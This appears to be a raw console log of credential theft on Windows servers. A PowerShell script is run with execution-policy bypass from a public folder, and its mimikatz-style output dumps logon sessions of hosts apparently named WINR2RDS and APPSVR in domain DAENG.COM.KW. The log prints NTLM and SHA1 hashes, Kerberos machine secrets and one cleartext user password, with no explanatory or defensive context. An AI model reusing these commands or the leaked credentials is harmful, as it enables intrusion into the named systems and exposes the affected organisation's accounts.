	 * Password : ec d6 b6 95 ec 6b 8c e6 8a 64 19 7d 94 20 79 b2 20 f8 0d 13 d9 e8 ec 3f 9b 0b ea 6e 9e 1f 90 d9 35 5f 45 82 85 ea c6 13 8e 8c 5c 2d 19 05 cd 0d 12 80 f9 27 13 e4 f4 43 c8 6d 32 8d 4b a8 54 df 17 80 84 3f 30 5c 78 50 26 17 37 e7 10 c7 c8 c0 eb 99 88 32 ed cd e4 62 61 c7 c5 a0 51 ed e1 5f 39 c4 e3 ae 76 a9 c4 3f 9e a8 89 4d f1 f6 e1 6a 13 ae 71 dc d8 14 79 30 61 77 75 57 4c 4f 36 b8 42 ad b6 4d d7 cb c9 6b 0c b7 a1 8e 48 3d aa da 12 73 a4 ea 75 69 56 1f 8b 44 ea a8 91 3b f3 7a c3 b3 4e 81 34 b4 63 38 91 f9 f1 74 36 0e bf 92 24 b2 cf 7d a2 58 96 6a 3b 66 6b ee 2f fd a4 fb 24 5c 72 b5 47 25 0e 80 c6 ef 63 8d ab 06 22 29 9f 10 fe 36 d9 ed a3 a0 16 72 41 63 40 90 01 f4 6f 82 20 ae 79 0b e5 8c 23 16 4f 30 04 f8 dc 06 
	ssp :	
	credman :	

C:\Windows\system32>


Command:> powershell -exec bypass -file C:\Users\Public\Public_Data\files\mn.ps1


Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>powershell -exec bypass -file C:\Users\Public\Public_Data\files\mn.ps1 2>&1
Update-ExeFunctions : Cannot bind argument to parameter 'ExeArguments' because 
it is an empty string.
At line:2359 char:140
+ ...  -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
+                    ~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Update-ExeFunctions], Paramete 
   rBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyStringNotAl 
   lowed,Update-ExeFunctions
 
20
Authentication Id : 0 ; 64898 (00000000:0000fd82)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/25/2017 10:54:26 AM
SID               : S-1-5-90-1
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WINR2RDS$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	KO
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WINR2RDS$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 11/25/2017 10:54:21 AM
SID               : S-1-5-20
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WINR2RDS$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : winr2rds$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 11/25/2017 10:54:27 AM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 64933 (00000000:0000fda5)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/25/2017 10:54:26 AM
SID               : S-1-5-90-1
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WINR2RDS$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	KO
	credman :	

Authentication Id : 0 ; 40739 (00000000:00009f23)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 11/25/2017 10:53:17 AM
SID               : 
	msv :	
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	KO
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WINR2RDS$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 11/25/2017 10:53:16 AM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WINR2RDS$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : winr2rds$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	KO
	credman :	

C:\Windows\system32>




Command:> powershell -exec bypass -file C:\Users\Public\Public_Data\files\mn.ps1


Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>powershell -exec bypass -file C:\Users\Public\Public_Data\files\mn.ps1 2>&1
Update-ExeFunctions : Cannot bind argument to parameter 'ExeArguments' because 
it is an empty string.
At line:2359 char:140
+ ...  -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
+                    ~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Update-ExeFunctions], Paramete 
   rBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyStringNotAl 
   lowed,Update-ExeFunctions
 
20
Authentication Id : 0 ; 192806 (00000000:0002f126)
Session           : Service from 0
User Name         : ReportServer$SQLSERVER2016
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:35 AM
SID               : S-1-5-80-3870417974-1814890342-121726608-113536288-3110027356
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 12/15/2017 3:00:14 AM
SID               : S-1-5-17
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 157386 (00000000:000266ca)
Session           : Service from 0
User Name         : MSSQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:25 AM
SID               : S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 51310188 (00000000:030eee6c)
Session           : Interactive from 1
User Name         : AutoPro
Domain            : APPSVR
Logon Server      : APPSVR
Logon Time        : 12/16/2017 7:16:25 AM
SID               : S-1-5-21-2917719874-2242573776-2335096429-1006
	msv :	
	 [00000003] Primary
	 * Username : AutoPro
	 * Domain   : APPSVR
	 * NTLM     : e5ea823e9dee48228e7d9668f9446ce8
	 * SHA1     : 8271c6c1c8db84eb16753674824b0bc6157e296e
	 [00010000] CredentialKeys
	 * NTLM     : e5ea823e9dee48228e7d9668f9446ce8
	 * SHA1     : 8271c6c1c8db84eb16753674824b0bc6157e296e
	tspkg :	
	wdigest :	
	 * Username : AutoPro
	 * Domain   : APPSVR
	 * Password : (null)
	kerberos :	
	 * Username : AutoPro
	 * Domain   : APPSVR
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 73910 (00000000:000120b6)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:05 AM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 153674 (00000000:0002584a)
Session           : Service from 0
User Name         : MSSQL$SQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:22 AM
SID               : S-1-5-80-1768481418-4243586691-1349411104-1299650809-3159321943
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 147596 (00000000:0002408c)
Session           : Service from 0
User Name         : MsDtsServer120
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:17 AM
SID               : S-1-5-80-3642287774-1615985598-572449333-1370030010-3123895339
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 230385 (00000000:000383f1)
Session           : Service from 0
User Name         : SSASTELEMETRY$SQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:41 AM
SID               : S-1-5-80-629268008-2907960483-2328140268-1703003151-2767848116
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 238523 (00000000:0003a3bb)
Session           : Service from 0
User Name         : SSASTELEMETRY$SQLSERVER2016
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:42 AM
SID               : S-1-5-80-132970303-388802486-3460008973-3223686335-178081635
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 100492 (00000000:0001888c)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:10 AM
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 214200 (00000000:000344b8)
Session           : Service from 0
User Name         : SQLSERVERAGENT
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:39 AM
SID               : S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 22066080 (00000000:0150b3a0)
Session           : Batch from 0
User Name         : AutoPro
Domain            : APPSVR
Logon Server      : APPSVR
Logon Time        : 12/15/2017 3:46:30 AM
SID               : S-1-5-21-2917719874-2242573776-2335096429-1006
	msv :	
	 [00010000] CredentialKeys
	 * NTLM     : e5ea823e9dee48228e7d9668f9446ce8
	 * SHA1     : 8271c6c1c8db84eb16753674824b0bc6157e296e
	 [00000003] Primary
	 * Username : AutoPro
	 * Domain   : APPSVR
	 * NTLM     : e5ea823e9dee48228e7d9668f9446ce8
	 * SHA1     : 8271c6c1c8db84eb16753674824b0bc6157e296e
	tspkg :	
	wdigest :	
	 * Username : AutoPro
	 * Domain   : APPSVR
	 * Password : (null)
	kerberos :	
	 * Username : AutoPro
	 * Domain   : APPSVR
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 51310109 (00000000:030eee1d)
Session           : Interactive from 1
User Name         : AutoPro
Domain            : APPSVR
Logon Server      : APPSVR
Logon Time        : 12/16/2017 7:16:25 AM
SID               : S-1-5-21-2917719874-2242573776-2335096429-1006
	msv :	
	 [00010000] CredentialKeys
	 * NTLM     : e5ea823e9dee48228e7d9668f9446ce8
	 * SHA1     : 8271c6c1c8db84eb16753674824b0bc6157e296e
	 [00000003] Primary
	 * Username : AutoPro
	 * Domain   : APPSVR
	 * NTLM     : e5ea823e9dee48228e7d9668f9446ce8
	 * SHA1     : 8271c6c1c8db84eb16753674824b0bc6157e296e
	tspkg :	
	wdigest :	
	 * Username : AutoPro
	 * Domain   : APPSVR
	 * Password : (null)
	kerberos :	
	 * Username : AutoPro
	 * Domain   : APPSVR
	 * Password : 123456Ap
	ssp :	
	credman :	

Authentication Id : 0 ; 186881 (00000000:0002da01)
Session           : Service from 0
User Name         : ReportServer
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:34 AM
SID               : S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 210011 (00000000:0003345b)
Session           : Service from 0
User Name         : SQL Server Distributed Replay Controller
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:38 AM
SID               : S-1-5-80-1337333740-2787872843-2774717225-1767203911-559312492
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 152286 (00000000:000252de)
Session           : Service from 0
User Name         : MSOLAP$SQLSERVER2016
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:20 AM
SID               : S-1-5-80-1063059839-1192272250-2800273586-1882469372-1142524711
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 218827 (00000000:000356cb)
Session           : Service from 0
User Name         : SQLTELEMETRY$SQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:40 AM
SID               : S-1-5-80-374725556-3612212497-2365472278-3259944318-2763227505
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 151228 (00000000:00024ebc)
Session           : Service from 0
User Name         : MSOLAP$SQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:19 AM
SID               : S-1-5-80-3254421939-1445487405-3242166695-1468160896-2192116829
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 367469 (00000000:00059b6d)
Session           : Service from 0
User Name         : MSSQLFDLauncher
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 3:00:20 AM
SID               : S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
